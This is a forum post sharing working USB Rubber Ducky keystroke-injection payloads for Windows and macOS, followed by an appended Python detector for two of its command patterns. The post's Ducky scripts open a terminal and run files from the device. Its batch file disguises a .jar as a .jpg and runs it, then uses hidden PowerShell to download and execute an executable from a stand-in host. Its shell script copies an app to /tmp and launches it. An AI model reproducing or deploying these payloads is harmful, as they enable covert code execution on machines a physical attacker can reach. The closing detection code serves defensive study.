Mohamed A. Baset, Posted November 27, 2016

Hi Guys, Hola Chicos

Without long introductions, I'm a big fan of Rubber Ducky, BadUSB techniques, automation stuff, etc. A long time ago I was working hard to get the ideal cross-platform payload which works:

1. Cross-OS
2. Cross-keyboard layouts (not all of them currently)

As we all know, in the Rubber Ducky dual mode (Keyboard + Mass storage) we can't *that easily* get the drive letter dynamically, and all you have to do is execute this command line:

```
for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
```

This command line loops over the current drive letters and finds the one which has the name "DUCKY", then assigns the variable "duck" to its drive letter; after that the %duck% variable will always be pointing to the USB Rubber Ducky drive letter. Cool!

Simulating and writing this command line on some OS keyboard layouts is a big HEADACHE. Writing (', |, ", ^, etc.) is an Ughhhh, a big mess. I wished that the USB Rubber Ducky had copy-paste from any source, but what can we do, it is a keyboard and we are functionally limited here! Spanish guys know about the big headache of pressing the "AltGr" key to get some symbols like @#^, and the only way to simulate this is by modifying the kb layout, adding some ASCII codes and stuff, then rewriting the ducky script etc., so this topic is for you guys to jump over it. Cheers!
The Windows part (Win 8.1 Eng & Win 7 Esp)

So I came up with an idea (a tiny but cool one) that allowed me to execute one payload on both Windows 8.1 English UI/Kb Layout and Windows 7 Español UI/Kb Layout, and for extra fun I added some code to achieve the same on macOS Sierra (a cool way to execute something from Ducky mass storage without the headache of the drive letter; later I will explain why). Here we go:

```
DEFAULT_DELAY 75
DELAY 1000
WINDOWS r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING for %p in
DELAY 10
SHIFT 8
STRING A B C D E F G H I J K L M N
DELAY 100
STRING O P Q R S T U V W X Y Z
DELAY 10
SHIFT 9
DELAY 100
STRING do %p
DELAY 10
SHIFT .
SHIFT 7
STRING r.bat
ENTER
DELAY 100
STRING for %p in
DELAY 100
STRING (A B C D E F G H I J K L M N
DELAY 100
STRING O P Q R S T U V W X Y Z)
DELAY 100
STRING do %p:/r.bat
ENTER
```

You guys don't need me for sure to explain each step, but I will only explain the highlights:

1. I'm looping (in a hard-coded way) over all the drive letters connected to the machine to find our ONE and execute ANYTHING from a stored .bat file (possibilities are endless here to do what you want).
2. The loop mentioned above is executed twice, first on a Spanish (Latin) keyboard layout, and you can notice that I used the "SHIFT 8" key combination to simulate "(" and "SHIFT 9" to simulate ")" to achieve the command line:

```
for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/symbiansymoh.bat
```

So, a "for" loop to execute a bat file, and this loop will be executed twice (one time for the English kb layout and the other for the Spanish kb layout).

You can put anything inside this symbiansymoh.bat file, but to satisfy your curiosity guys, here's my content:

```
@echo off
color 10
REM Getting our drive letter which has the name SYMB, assign it to symb
for /f %%d in ('wmic volume get driveletter^, label ^| findstr "SYMB"') do set symb=%%d
REM Copy a NOTmalicious file to the temp folder
copy %symb%\Executables\NOTmalicious.jpg %tmp%\NOTmalicious.jar /y
REM Executing the NOTmalicious file
start %tmp%\NOTmalicious.jar
REM Downloading and executing another NOTmalicious file
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://www.BlahBlahBlah.com/Whatever.exe','%TEMP%\Whatever.exe'); Start-Process "%TEMP%\Whatever.exe"
REM Goodbye
exit
```

It doesn't matter now what language the machine you're executing the bat file on is using.
The macOS part (English KB Layout)

The macOS part is the best and a kind of no-brainer here. As you may know, Linux, Unix and Linux/Unix-like OSes use and identify USB storage by its NAME, not LETTER (there's nothing called letters in this beautiful and lovely world). So sending the key combinations to fire the Spotlight search then opening the Terminal is so freaking easy, then navigating to "/Volumes/[DRIVE_NAME]/", giving the bash file "symbiansymoh.sh" the executing privileges (chmod +X), then executing it, which also does ANYTHING from a stored .sh file (possibilities are endless here to do what you want) << copy paste

```
DEFAULT_DELAY 75
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 100
ENTER
DELAY 500
STRING chmod +X /Volumes/SYMB/symbiansymoh.sh
ENTER
DELAY 100
STRING nohup sh /Volumes/SYMB/symbiansymoh.sh &>/dev/null &
ENTER
DELAY 100
GUI q
DELAY 300
ENTER
```

And again, to feed your curiosity, here's the content of my symbiansymoh.sh file:

```
#!/bin/bash
rm -r /tmp/NOTmalicious.app;
cp -R /Volumes/SYMB/NOTmalicious /tmp/NOTmalicious.app;
open /tmp/NOTmalicious.app;
```

which copies a stored NOTmalicious.app file to the temp folder, then executes it.

Here's a PoC video demonstrating the blah blah blah above: https://www.youtube.com/watch?v=YHzcI42dFOI

The topic is open to discussion. Any ideas or modifications are always welcome! Cheers and have a great weekend guys!
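As an added defensive example (not part of the post above), the two command-line shapes the post relies on, the hard-coded A-to-Z drive-letter sweep and the `wmic volume ... | findstr` volume-label lookup, are distinctive enough to flag in process-creation telemetry. The command lines below are constructed samples, and the regexes and the eight-letter threshold are my assumptions, not a published rule:

```python
import re

# Constructed sample process-creation command lines, in the shape an EDR or
# Sysmon (Event ID 1) would record. Made up for this example, not captured data.
SAMPLE_CMDLINES = [
    # Hard-coded drive-letter sweep as typed by the Windows Ducky script
    "cmd.exe /c for %p in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do %p:/r.bat",
    # Same sweep without spaces around the parentheses (Spanish-layout variant)
    "cmd.exe /c for %p in(A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do %p:/r.bat",
    # Volume-label lookup used to resolve the removable drive's letter
    "cmd.exe /c for /f %d in ('wmic volume get driveletter^, label ^| findstr \"SYMB\"') do set symb=%d",
    # Benign admin activity that must not fire
    "cmd.exe /c for %f in (*.log) do type %f",
    "C:\\Windows\\System32\\notepad.exe C:\\Users\\alice\\notes.txt",
]

# A FOR loop whose set is a long run of single-letter tokens, each then used as
# a drive root (X:\ or X:/). Eight or more letters is an assumed threshold.
DRIVE_SWEEP = re.compile(
    r"\bfor\s+%%?\w\s+in\s*\(\s*(?:[A-Za-z]\s+){8,}[A-Za-z]\s*\)\s*do\s+%%?\w:[\\/]",
    re.IGNORECASE,
)
# wmic volume enumeration filtered by label with findstr.
LABEL_LOOKUP = re.compile(
    r"\bwmic\s+volume\s+get\s+driveletter\b.*\bfindstr\b",
    re.IGNORECASE,
)

INDICATORS = {
    "drive_letter_sweep": DRIVE_SWEEP,
    "volume_label_lookup": LABEL_LOOKUP,
}


def detect(cmdline):
    """Return the names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def scan(cmdlines):
    """Return (line_index, [indicators]) for each command line that matched."""
    hits = []
    for i, line in enumerate(cmdlines):
        found = detect(line)
        if found:
            hits.append((i, found))
    return hits


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_CMDLINES):
        print(idx, found, SAMPLE_CMDLINES[idx])
```

The label lookup on its own is also used by legitimate admin scripts, so it is best treated as a low-severity signal that is raised when it follows a keyboard-class USB device arrival or appears together with the sweep.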